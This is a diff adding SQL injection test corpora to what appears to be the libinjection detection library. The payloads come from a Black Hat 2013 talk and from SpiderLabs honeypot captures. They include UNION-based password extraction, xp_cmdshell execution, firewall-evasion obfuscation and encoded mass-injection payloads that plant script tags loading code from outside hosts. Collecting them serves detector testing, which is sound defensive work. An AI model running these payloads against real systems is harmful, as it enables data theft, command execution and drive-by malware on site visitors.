+aa%27+%25+1+or+%271
|
||||
+aa%27+%2F+%271%27+%3C+%273
|
||||
+aa%27+%2F+%2B1+%3C+%273
|
||||
+aa%27+-+%2B+%21+2+%21%3D+%2B+-+%271
|
||||
+aa%27+-+%2B+%21+1+or+%271
|
||||
+aa%27+%2F+%2B1+like+%270
|
||||
+%27+%2F+%2B+%281%29+%2F+%2B+%281%29+%3D%27
|
||||
+aa%27+%26+%2B%280%29-%281%29%3D%27aa
|
||||
+aa%27+%5E%2B+-%280%29+%2B+-%280%29+%3D+%270
|
||||
+aa%27+%5E+%2B+-+3+or+%271
|
||||
+aa%27+%5E+%2B0%21%3D%271
|
||||
+aa%27+%3C+%2B3+or+%271
|
||||
+aa%27+%25+%2B1+or+%271
|
||||
aa%27or+column%2A0+like%270
|
||||
aa%27or+column%2A0%3D%270
|
||||
aa%27or+current_date%2A0
|
||||
1%27%2Fcolumn+is+not+null+-+%27+
|
||||
1%27%2Acolumn+is+not+%5CN+-+%27+
|
||||
1%27%5Ecolumn+is+not+null+-+%27+
|
||||
aa%27+is+0+or+%271
|
||||
%27+or+MATCH+username+AGAINST+%28%27%2Badmin+-a%27+IN+BOOLEAN+MODE%29%3B+--+-a
|
||||
%27+or+MATCH+username+AGAINST+%28%27a%2A+-%29+-%2B+%27+IN+BOOLEAN+MODE%29%3B+--+-a
|
||||
1%27%2A%40a+or+%271
|
||||
1%27%2Anull+or+%271
|
||||
1%27%2AUTC_TIME+or+%271
|
||||
1%27%2Anull+is+null+-+%27
|
||||
1%27%2A%40a+is+null+-+%27
|
||||
1%27%2A%40%40version%2A-0%2520%3D%2520%270
|
||||
1%27%2Acurrent_date+rlike%270
|
||||
aa%27%2Fcurrent_date+in+%280%29+--+-a
|
||||
aa%27+%2F+current_date+regexp+%270
|
||||
aa%27+%2F+current_date+%21%3D+%271
|
||||
1%27+or+current_date%2A-0+rlike%271
|
||||
0%27+%2F+current_date+XOR+%271
|
||||
%27or+not+false+%23aa
|
||||
1%27+%2A+id+-+%270
|
||||
1%27+%2Aid-%270
|
||||
asd%27%3B+shutdown%3B+
|
||||
asd%27%3B+select+null%2Cpassword%2Cnull+from+users%3B+
|
||||
aa+aa%27%3B+DECLARE+tablecursor+CURSOR+FOR+select+a.name+as+c%2Cb.name+as+d%2C%28null%29from+sysobjects+a%2Csyscolumns+b+where+a.id%3Db.id+and+a.xtype+%3D+%28+%27u%27+%29+and+current_user+%3D+current_user+OPEN+tablecursor+
|
||||
aa+aa%27%3B+DECLARE+tablecursor+CURSOR+FOR+select+a.name+as+c%2Cb.name+as+d%2C%28null%29from+sysobjects+a%2Csyscolumns+b%0A++++++++++++++++++++++++where+a.id%3Db.id+and+a.xtype+%3D+%28+%27u%27+%29+and+current_user+%3D+current_user%0A++++++++++++++++++++++++OPEN+tablecursor+FETCH+NEXT+FROM+tablecursor+INTO+%40a%2C%40b+WHILE%28%40a+%21%3D+null%29%0A++++++++++++++++++++++++%40query++%3D+null%2Bnull%2Bnull%2Bnull%2B+%27+UPDATE+%27%2Bnull%2B%40a%2Bnull%2B+%27+SET+id%3Dnull%2C%40b+%3D+%40payload%27%0A++++++++++++++++++++++++BEGIN+EXEC+sp_executesql+%40query%0A++++++++++++++++++++++++FETCH+NEXT+FROM+tablecursor+INTO+%40a%2C%40b+END%0A++++++++++++++++++++++++CLOSE+tablecursor+DEALLOCATE+tablecursor%3B%0A++++++++++++++++++++++++and+some+text%2C+to+get+pass+the+centrifuge%3B+and+some+more+text.
|
||||
%40query++%3D+null%2Bnull%2Bnull%2B+%27+UPDATE+%27%2Bnull%2B%40a%2B+%27+SET%5B++%27%2Bnull%2B%40b%2B+%27+%5D++%3D+%40payload%27
|
||||
asd%27+union+distinct%28select+null%2Cpassword%2Cnull+from+users%29--a+
|
||||
asd%27+union+distinct+%28+select+null%2Cpassword%2C%28null%29from+user+%29--+a+
|
||||
# double encoded
|
||||
## DECLARE%2520%40S%2520CHAR%284000%29%3BSET%2520%40S%3DCAST%280x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%2520AS%2520CHAR%284000%29%29%3BEXEC%28%40S%29%3B
|
||||
DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
|
||||
## asaa%27%3BSELECT%5Basd%5DFROM%5Basd%5D
|
||||
## asd%27%3B+select+%5Bcolumn%5D+from+users+
|
||||
0x31+union+select+%40%40version%2Cusername%2Cpassword+from+users+
|
||||
1+order+by+if%281%3C2+%2Cuname%2Cuid%29+
|
||||
1+order+by+ifnull%28null%2Cuserid%29+
|
||||
2%27+between+1+and+3+or+0x61+like+%27a
|
||||
4%27+MOD+2+like+%270
|
||||
-1%27+%2FID+having+1%3C+1+and+1+like+1%2F%271+
|
||||
2%27+%2F+0x62+or+0+like+binary+%270
|
||||
0%27+between+2-1+and+4-1+or+1+sounds+like+binary+%271+
|
||||
-1%27+union+%28%28select+%28select+user%29%2C%28select+password%29%2C1%2F1+from+mysql.user%29%29+order+by+%271+
|
||||
-1%27+or+substring%28null%2Fnull%2C1%2Fnull%2C1%29+or+%271
|
||||
1%27+and+1+%3D+hex%28null-1+or+1%29+or+1+%2F%27null+
|
||||
AND+CONNECTION_ID%28%29%3DCONNECTION_ID%28%29
|
||||
AND+ISNULL%281%2F0%29
|
||||
MID%28%40%40hostname%2C+1%2C+1%29
|
||||
CHARSET%28CURRENT_USER%28%29%29
|
||||
DATABASE%28%29+LIKE+SCHEMA%28%29
|
||||
COERCIBILITY%28USER%28%29%29
|
||||
1%27+and+0x1abc+like+0x88+or+%270
|
||||
%27-1-0+union+select+%28select+%60table_name%60+from+%60information_schema%60.tables+limit+1%29+and+%271
|
||||
null%27%27null%27+find_in_set%28uname%2C+%27lightos%27+%29+and+%271
|
||||
%28case-1+when+mid%28load_file%280x61616161%29%2C12%2C+1%2F+1%29like+0x61+then+1+else+0+end%29+
|
||||
%27sounds+like%281%29+union%19%28select%191%2Cgroup_concat%28table_name%29%2C3%19from%19information_schema.%60tables%60%29%23%28
|
||||
0%27+%271%27+like+%280%29+and+1+sounds+like+a+or+true%231
|
||||
+0%27rlike%280%29and+1+rlike+%28%40a%29or+true+-+%27+0+
|
||||
2a%27-1%5E+%27+0%27+and+%28select+mid%28user%2C1+%2F1%2C1%2F+1%29from%60mysql%60.user+limit+1%29+rlike+%27r
|
||||
+A%27+sounds+like%28select+case%281%3D1%29when%271%27then%27A%27end%29+and+%271
|
||||
1%27+and+0x31%3D%271+
|
||||
1%27+and+0x05%3D%28select+0-+-mid%28version%28%29%2F-+-1%2C+1%2C1%29+as+%27a%27+from+dual%29+and+%271+
|
||||
%27AND+1.-1LIKE.1+EXEC+xp_cmdshell+%27dir+
|
||||
|
||||
# skipping
|
||||
#SELECT+1%2C2%2C0xEF%60
|
||||
#SELECT+1%2C2%2C3%60abc%60%60
|
||||
|
||||
1%27AND%23%0A++++++++++++++++++++++++0%23%0A++++++++++++++++++++++++UNION%23%0A++++++++++++++++++++++++SELECT%40a%3A%3Dtable_name+FROM%23%0A++++++++++++++++++++++++information_schema.tables+LIMIT+1%23
|
||||
1%27+and+0x43+%3D+%28select+all+mid%28table_name%2C+1%2C1%29as%27a%27from+%60information_schema%60.tables+limit+1%29+and+%271%0A++++++++++++++++++++++++%27AND+1.-1LIKE.1+INSERT+INTO+TMP_DB+EXEC+%22xp_cmdshell%22%27dir
|
||||
1%27+AND+0x35+%3D+%28SELECT+%40phpids%3A%3DMID%28%40%40version+FROM+1+FOR+1%29+FROM+dual%29+and+%271+
|
||||
null%27+or+%40%3A%3D%28select+all+user%27%27+from+mysql+.+user+limit+1%29+union%23%0A++++++++++++++++++++++++%23%0A++++++++++++++++++++++++select+%40%27
|
||||
1%27and+%23%0A++++++++++++++++++++++++%23aa%0A++++++++++++++++++++++++0+union%23%0A++++++++++++++++++++++++%23bb%0A++++++++++++++++++++++++select+version%28%29%60
|
||||
1%27and+%23%0A++++++++++++++++++++++++%23aa%0A++++++++++++++++++++++++0+union%23%0A++++++++++++++++++++++++%23bb%0A++++++++++++++++++++++++select+%28select+%60user%60+from%23%0A++++++++++++++++++++++++%23cc%0A++++++++++++++++++++++++mysql.user+limit+1%29%27
|
151
libinjection/data/sqli-rsalgado-bhusa2013.txt
Normal file
151
libinjection/data/sqli-rsalgado-bhusa2013.txt
Normal file
|
@ -0,0 +1,151 @@
|
|||
#
|
||||
# from
|
||||
# Roberto Salgado
|
||||
# SQLi Optimization and Obfuscation Techniques
|
||||
# Black Hat USA 2013
|
||||
#
|
||||
|
||||
#
|
||||
# Slide 47 - Optimizing Queries MSSQL
|
||||
# (note: slightly reworked to put in SQLi format)
|
||||
#
|
||||
1 UNION SELECT table_name + ', ' FROM information_schema.tables FOR XML PATH('')
|
||||
|
||||
#
|
||||
# Slide 48 - Optimizing Queries Oracle
|
||||
# (note: slightly reworked to put in SQLi format)
|
||||
#
|
||||
1 UNION SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables
|
||||
|
||||
#
|
||||
# Slide 49 - Optimizing Queries PSQL
|
||||
# (note: slightly reworked to put in SQLi format)
|
||||
#
|
||||
1 UNION SELECT array_to_json(array_agg(tables))::text FROM (SELECT schemaname, relname FROM pg_stat_user_tables) AS tables LIMIT 1
|
||||
|
||||
#
|
||||
# Slide 50 - Optimizing Queries MSSQL
|
||||
#
|
||||
IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--
|
||||
|
||||
#
|
||||
# Slide 54 - Optimizing Queries - More Single Liners
|
||||
# (
|
||||
1 OR 1#"OR"'OR''='"="'OR''='
|
||||
|
||||
#
|
||||
# Slide 55
|
||||
#
|
||||
1 OR 1#"OR"'OR''='"="'OR''='
|
||||
|
||||
#
|
||||
# Slide 61
|
||||
#
|
||||
1!=0--+"!="'!='
|
||||
|
||||
#
|
||||
# Slide 64 How to confuse an Admin
|
||||
#
|
||||
1 UNION select@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO $ fRom(SeLEct@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO frOM`information_schema`.`triggers`)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO WHere !FAlSE||tRue&&FalSe||FalsE&&TrUE like TruE||FalSE union/*!98765select@000OO0O0OooOoO0OOoooOOoOooo0o0o:=grOup_cONcaT(`username`)``from(users)whErE(username)like'admin'limit 1*/select@000OO0O0OooOoO0OOoooO0oOooo0o0o limit 1,0 UnION SeleCt(selEct(sELecT/*!67890sELect@000OO0O0O0oOoO0OOoooOOoOooo0o0o:=group_concat(`table_name`)FrOM information_schema.statistics WhERE TABLe_SCHEmA In(database())*//*!@000OO0O0OooOoO0OOoooO0oOooo0o0o:=gROup_conCat(/*!taBLe_naME)*/fRoM information_schema.partitions where TABLe_SCHEma not in(concat((select insert(insert((select (collation_name)from(information_schema.collations)where(id)=true+true),true,floor(pi()),trim(version()from(@@version))),floor(pi()),ceil(pi()*pi()),space(0))), conv((125364/(true-!true))-42351, ceil(pi()*pi()),floor(pow(pi(),pi()))),mid(aes_decrypt(aes_encrypt(0x6175746F6D6174696F6E,0x4C696768744F53),0x4C696768744F53)FROM floor(version()) FOR ceil(version())),rpad(reverse(lpad(collation(user()),ceil(pi())--@@log_bin,0x00)),! !true,0x00),CHAR((ceil(pi())+!false)*ceil((pi()+ceil(pi()))*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--ceil(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--floor(pi()*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-floor(pi()))),0x6d7973716c))from(select--(select~0x7))0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO)from(select@/*!/*!$*/from(select+3.``)000oOOO0Oo0OOooOooOoO00Oooo0o0oO)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO/*!76799sElect@000OO0O0OooOoO00Oooo0OoOooo0o0o:=group_concat(`user`)``from`mysql.user`WHeRe(user)=0x726f6f74*/#(SeLECT@ uNioN sElEcT AlL group_concat(cOLumN_nAME,1,1)FroM InFoRMaTioN_ScHemA.COLUMNS where taBle_scHema not in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c)UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@000OO0O0OooOoO0OOoooO0oOooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO)
|
||||
|
||||
|
||||
#
|
||||
# Slide 74 (MySQL Obfuscation)
|
||||
#
|
||||
1.UNION SELECT 2
|
||||
3.2UNION SELECT 2
|
||||
1e0UNION SELECT 2
|
||||
SELECT\N/0.e3UNION SELECT 2
|
||||
1e1AND-0.0UNION SELECT 2
|
||||
1/*!12345UNION/*!31337SELECT/*!table_name*/
|
||||
{ts 1}UNION SELECT.`` 1.e.table_name
|
||||
SELECT $.`` 1.e.table_name
|
||||
SELECT{_ .``1.e.table_name}
|
||||
SELECT LightOS . ``1.e.table_name LightOS)
|
||||
SELECT information_schema 1337.e.tables 13.37e.table_name
|
||||
SELECT 1 from information_schema 9.e.table_name
|
||||
|
||||
#
|
||||
# Slide 75 (MSSQL Obfuscation)
|
||||
#
|
||||
.1UNION SELECT 2
|
||||
1.UNION SELECT.2alias
|
||||
1e0UNION SELECT 2
|
||||
1e1AND-1=0.0UNION SELECT 2
|
||||
SELECT 0xUNION SELECT 2
|
||||
SELECT\UNION SELECT 2
|
||||
\1UNION SELECT 2
|
||||
SELECT 1FROM[table]WHERE\1=\1AND\1=\1
|
||||
SELECT"table_name"FROM[information_schema].[tables]
|
||||
|
||||
#
|
||||
# Slide 76 (Oracle Obfuscation)
|
||||
#
|
||||
1FUNION SELECT 2
|
||||
1DUNION SELECT 2
|
||||
SELECT 0x7461626c655f6e616d65 FROM all_tab_tables
|
||||
SELECT CHR(116) || CHR(97) || CHR(98) FROM all_tab_tables
|
||||
SELECT%00table_name%00FROM%00all_tab_tables
|
||||
|
||||
#
|
||||
# Slide 77 (Bypassing Firewalls, General Tips)
|
||||
#
|
||||
1 UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
|
||||
CASE WHEN BINARY TRUE THEN TRUE END IS NOT UNKNOWN HAVING TRUE FOR UPDATE
|
||||
|
||||
#
|
||||
# Slide 78 (Modsecurity)
|
||||
#
|
||||
-2 div 1 union all #in%0a#between comments%0a#in%0a#between comments%0aselect 0x00, 0x41 like/*!31337table_name*/,3 from information_schema.tables limit 1
|
||||
|
||||
#
|
||||
# Slide 79 (Modsecurity)
|
||||
#
|
||||
CASE WHEN BINARY TRUE THEN TRUE END IS UNKNOWN FOR UPDATE UNION SELECT MATTRESSES
|
||||
|
||||
#
|
||||
# Slide 80 (Fortinet)
|
||||
# (Skipped since specific to Fortinet)
|
||||
#S%A0E%B1L%C2E%D3C%E4T%F6 1 U%FFNION SEL%FFECT 2
|
||||
|
||||
#
|
||||
# Slide 81 (GreenSQL)
|
||||
#
|
||||
-1 UNION SELECT table_name FROM information_schema.tables limit 1
|
||||
1 AND 1=0 UNION SELECT table_name FROM information_schema.tables limit 1
|
||||
1 AND 1=0.e1 UNION SELECT table_name FROM information_schema.tables limit 1
|
||||
1 AND 1= binary 1 UNION SELECT table_name FROM information_schema.tables limit 1
|
||||
IF((SELECT mid(table_name,1,1) FROM information_schema.tables limit 1) =‘C’,1,2)
|
||||
|
||||
#
|
||||
# Slide 83 (libinjection)
|
||||
#
|
||||
-1 UNION SELECT table_name Websec FROM information_schema.tables LIMIT 1
|
||||
-1 UNION%0ASELECT table_name FROM information_schema.tables LIMIT 1
|
||||
|
||||
# note changed "FROM table" to "FROM table_name"
|
||||
# and "column" to "column_name"
|
||||
-1fUNION SELECT column_name FROM table_name
|
||||
|
||||
1; DECLARE @test AS varchar(20); EXEC master.dbo.xp_cmdshell 'cmd'
|
||||
-[id] UNION SELECT table_name FROM information_schema.tables LIMIT 1
|
||||
{d 2} UNION SELECT table_name FROM information_schema.tables LIMIT 1
|
||||
|
||||
#
|
||||
# Slide 84 (libinjection)
|
||||
#
|
||||
1 between 1 AND`id` having 0 union select table_name from information_schema.tables
|
||||
1 mod /*!1*/ union select table_name from information_schema.tables--
|
||||
true is not unknown for update union select table_name from information_schema.tables
|
||||
test'-1/1/**/union(select table_name from information_schema.tables limit 1,1)
|
||||
-1 union select @``"", table_name from information_schema.tables
|
||||
-1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables
|
||||
$.``.id and 0 union select table_name from information_schema.tables
|
||||
-(select @) is unknown having 1 UNION select table_name from information_schema.tables
|
||||
/*!911111*//*!0*/union select table_name x from information_schema.tables limit 1
|
||||
-1.for update union select table_name from information_schema.tables limit 1
|
||||
-0b01 union select table_name from information_schema.tables limit 1
|
||||
1<binary 1>2 union select table_name from information_schema.tables limit 1
|
||||
-1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1
|
||||
|
||||
|
24
libinjection/data/sqli-spiderlabs-201107.txt
Normal file
24
libinjection/data/sqli-spiderlabs-201107.txt
Normal file
File diff suppressed because one or more lines are too long
24
libinjection/data/sqli-spiderlabs-201112.txt
Normal file
24
libinjection/data/sqli-spiderlabs-201112.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
#
|
||||
# http://blog.spiderlabs.com/2011/12/honeypot-alert-sql-injection-scanning-update-filter-evasions-detected.html
|
||||
#
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C0x33633273366962%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
200%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C6%2C0x33633273366962%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%22%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
4%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fmos_users--
|
||||
35022%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C2%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
12
libinjection/data/sqli-spiderlabs-201205.txt
Normal file
12
libinjection/data/sqli-spiderlabs-201205.txt
Normal file
|
@ -0,0 +1,12 @@
|
|||
#
|
||||
# http://blog.spiderlabs.com/2012/05/mass-sql-injection-payload-analysis.html
|
||||
#
|
||||
21+update+Categories+set+Category_Title=cast(Category_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
|
||||
21+update+Categories+set+Category_Title=REPLACE(cast(Category_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
||||
